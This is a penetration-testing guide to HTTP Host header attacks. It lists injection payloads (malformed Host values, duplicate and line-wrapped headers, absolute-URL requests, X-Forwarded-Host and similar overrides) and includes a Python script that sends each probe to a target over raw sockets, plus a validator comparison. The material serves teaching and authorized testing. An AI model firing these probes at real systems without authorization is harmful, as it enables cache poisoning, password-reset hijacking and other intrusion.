HTTP Host header attacks

Attacks that involve injecting a payload directly into the Host header

How to test

Supply an arbitrary Host header

The first step is to test what happens when you supply an arbitrary, unrecognized domain name via the Host header.

Sometimes, you will still be able to access the target website even when you supply an unexpected Host header. This could be for a number of reasons. For example, servers are sometimes configured with a default or fallback option in case they receive requests for domain names that they don't recognize. If your target website happens to be the default, you're in luck. In this case, you can begin studying what the application does with the Host header and whether this behavior is exploitable.

On the other hand, as the Host header is such a fundamental part of how websites work, tampering with it often means you will be unable to reach the target application at all. The front-end server or load balancer that received your request may simply not know where to forward it, resulting in an "Invalid Host header" error of some kind. This is especially likely if your target is accessed via a CDN. In this case, you should move on to trying some of the techniques outlined below.

Check for flawed validation

If an arbitrary Host is rejected, the validation itself may be flawed: it may only check a prefix of the value, strip what it takes to be a port, or parse the value as a URL component. Each of the following payloads targets a different parser, so try all three:

Host: vulnerable-website.com:bad-stuff-here
Host: vulnerable-website.com@bad-stuff-here
Host: vulnerable-website.com:123@bad-stuff-here
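The three payloads above are not interchangeable: each slips past a different kind of check. The script below, an added example rather than code from the original page, models two flawed validators that are hypothetical stand-ins for patterns seen in real code (a prefix match, and "strip the port" by splitting on the first colon), a hardened validator that parses the Host as host[:port] and exact-matches the name, and a helper that shows where a URL built from the Host would actually point (Python's urlsplit is used as a stand-in for the application's URL builder). ALLOWED_HOSTS and ALLOWED_PORTS are assumed values using the page's placeholder names.

```python
"""Why the three "flawed validation" payloads are different probes.

Added example, not from the original page. ALLOWED_HOSTS uses the page's
placeholder name; the two flawed validators are hypothetical models of
checks seen in real code, and the hardened check is what a reviewer
would ask for instead.
"""
import re
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"vulnerable-website.com"}   # page placeholder, assumed
ALLOWED_PORTS = {80, 443}                    # assumed deployment ports

# RFC 7230 Host is host[":"port]: no userinfo, no path, no whitespace.
_HOST_RE = re.compile(
    r"^([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*)"
    r"(?::([0-9]{1,5}))?$"
)


def flawed_prefix_check(host: str) -> bool:
    """Bug: passes anything that merely starts with an allowed name."""
    return any(host.startswith(allowed) for allowed in ALLOWED_HOSTS)


def flawed_split_check(host: str) -> bool:
    """Bug: 'strips the port' by keeping only the text before the first ':'.

    Rejects 'allowed@attacker' on its own, but passes 'allowed:123@attacker'.
    """
    return host.split(":", 1)[0] in ALLOWED_HOSTS


def hardened_check(host: str) -> bool:
    """Exact match on the parsed name; optional numeric port from a known set."""
    m = _HOST_RE.match(host.lower())
    if not m:
        return False
    name, port = m.group(1), m.group(2)
    if port is not None and int(port) not in ALLOWED_PORTS:
        return False
    return name in ALLOWED_HOSTS


def effective_hostname(host: str) -> Optional[str]:
    """Where a URL built as https://<host>/... actually points.

    Everything before '@' becomes userinfo, so the '@' payloads land on
    bad-stuff-here even when a validator was satisfied.
    """
    return urlsplit(f"https://{host}/reset").hostname


PAYLOADS = [
    "vulnerable-website.com",
    "vulnerable-website.com:bad-stuff-here",
    "vulnerable-website.com@bad-stuff-here",
    "vulnerable-website.com:123@bad-stuff-here",
]


def probe_table() -> Dict[str, Tuple[bool, bool, bool, Optional[str]]]:
    """For each payload: (prefix check, split check, hardened check, hostname)."""
    return {
        p: (flawed_prefix_check(p), flawed_split_check(p),
            hardened_check(p), effective_hostname(p))
        for p in PAYLOADS
    }


if __name__ == "__main__":
    for payload, row in probe_table().items():
        print(f"{payload:45} prefix={row[0]!s:5} split={row[1]!s:5} "
              f"hardened={row[2]!s:5} -> {row[3]}")
```

The table makes the point of the checklist concrete: the prefix check accepts all three payloads, the split check is beaten only by the port-plus-userinfo form, and the '@' variants resolve to bad-stuff-here once the Host is used to build a link. The ":bad-stuff-here" form is not a usable port for a browser, so its value is in probing how the validator handles the separator rather than in where the link points.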

Send ambiguous requests

These requests are built so that the front-end (which validates the Host) and the back-end (which uses it) may disagree about which value applies.

Inject duplicate Host headers

Try swapping the order of the two headers, since one server may honour the first Host header and another the last, and combine this with the special characters from the previous check.

GET /example HTTP/1.1
Host: vulnerable-website.com
Host: bad-stuff-here

Supply an absolute URL

With an absolute-form request-target, some servers take the host from the request line and ignore the Host header, while others do the reverse.

GET https://vulnerable-website.com/ HTTP/1.1
Host: bad-stuff-here

Add line wrapping

A header line that starts with a space may be treated as a continuation of the previous line (obsolete line folding), ignored, or parsed as a separate header. If front-end and back-end handle it differently, the indented Host reaches only one of them.

Ref: https://portswigger.net/web-security/request-smuggling

GET /example HTTP/1.1
 Host: bad-stuff-here
Host: vulnerable-website.com

Inject host override headers

Even when the Host header itself is validated, back-ends often trust the headers that proxies use to pass on the original host:

GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: bad-stuff-here

Other headers to try in place of X-Forwarded-Host:

X-Host: bad-stuff-here
X-Forwarded-Server: bad-stuff-here
X-HTTP-Host-Override: bad-stuff-here
Forwarded: host=bad-stuff-here
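Most HTTP client libraries normalise the Host header and refuse duplicates, indented header lines and an absolute-form request-target, so the checklist above is easiest to run from raw bytes on a plain socket. The script below is an added example, not code from the original page: it builds every probe from the sections above (arbitrary Host, the three flawed-validation payloads, duplicate Host in both orders, absolute URL, line wrapping, and the override headers), sends one over TLS, and reports the status line plus whether the injected value is reflected in the response. vulnerable-website.com and bad-stuff-here are the page's placeholders; the added "Connection: close" header is an assumption so that the server ends the response and the read loop terminates.

```python
"""Raw probes for the Host header checklist.

Added example, not from the original page. vulnerable-website.com and
bad-stuff-here are the page's placeholders; "Connection: close" is added
so the server closes the connection and the read loop below ends.
"""
import socket
import ssl
from typing import Dict, List

TARGET = "vulnerable-website.com"  # page placeholder, assumed
PAYLOAD = "bad-stuff-here"         # page placeholder, assumed
PATH = "/example"

OVERRIDE_HEADERS = ["X-Forwarded-Host", "X-Host",
                    "X-Forwarded-Server", "X-HTTP-Host-Override"]


def _raw(request_line: str, header_lines: List[str]) -> bytes:
    """Assemble a request; header lines are kept verbatim, leading spaces too."""
    return "\r\n".join([request_line, *header_lines,
                        "Connection: close", "", ""]).encode("ascii")


def build_probes(target: str = TARGET, payload: str = PAYLOAD,
                 path: str = PATH) -> Dict[str, bytes]:
    get = f"GET {path} HTTP/1.1"
    probes = {
        # Step 1: arbitrary, unrecognised Host
        "arbitrary-host": _raw(get, [f"Host: {payload}"]),
        # Step 2: flawed validation (port suffix, userinfo, port plus userinfo)
        "port-suffix": _raw(get, [f"Host: {target}:{payload}"]),
        "userinfo": _raw(get, [f"Host: {target}@{payload}"]),
        "port-userinfo": _raw(get, [f"Host: {target}:123@{payload}"]),
        # Step 3: ambiguous requests
        "duplicate-host": _raw(get, [f"Host: {target}", f"Host: {payload}"]),
        "duplicate-host-swapped": _raw(get, [f"Host: {payload}", f"Host: {target}"]),
        "absolute-url": _raw(f"GET https://{target}{path} HTTP/1.1",
                             [f"Host: {payload}"]),
        "line-wrapped": _raw(get, [f" Host: {payload}", f"Host: {target}"]),
    }
    # Step 4: override headers a proxy chain might trust
    for name in OVERRIDE_HEADERS:
        probes[f"override-{name}"] = _raw(get, [f"Host: {target}", f"{name}: {payload}"])
    probes["override-Forwarded"] = _raw(get, [f"Host: {target}",
                                              f"Forwarded: host={payload}"])
    return probes


def send_probe(raw: bytes, connect_host: str, port: int = 443,
               use_tls: bool = True, timeout: float = 5.0) -> bytes:
    """Send one probe and return the full response (server closes the socket)."""
    sock = socket.create_connection((connect_host, port), timeout=timeout)
    if use_tls:
        # SNI still names the real target; only the HTTP-layer Host is tampered with.
        ctx = ssl.create_default_context()
        sock = ctx.wrap_socket(sock, server_hostname=connect_host)
    with sock:
        sock.sendall(raw)
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def status_line(response: bytes) -> str:
    return response.split(b"\r\n", 1)[0].decode("latin-1", "replace")


def reflects(response: bytes, payload: str = PAYLOAD) -> bool:
    """The signal to look for: the injected value appears in the response
    (Location header, generated links, cache keys), so the app used it."""
    return payload.encode() in response


if __name__ == "__main__":
    for name, raw in build_probes().items():
        resp = send_probe(raw, TARGET)
        print(f"{name:28} {status_line(resp):40} reflected={reflects(resp)}")
```

A reflected payload in a redirect or link is the cue to move on to the exploitation techniques linked below; an "Invalid Host header" response to every probe usually means the front-end is doing the routing and the override headers are the only remaining path.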

How to exploit the HTTP Host header

https://portswigger.net/web-security/host-header/exploiting
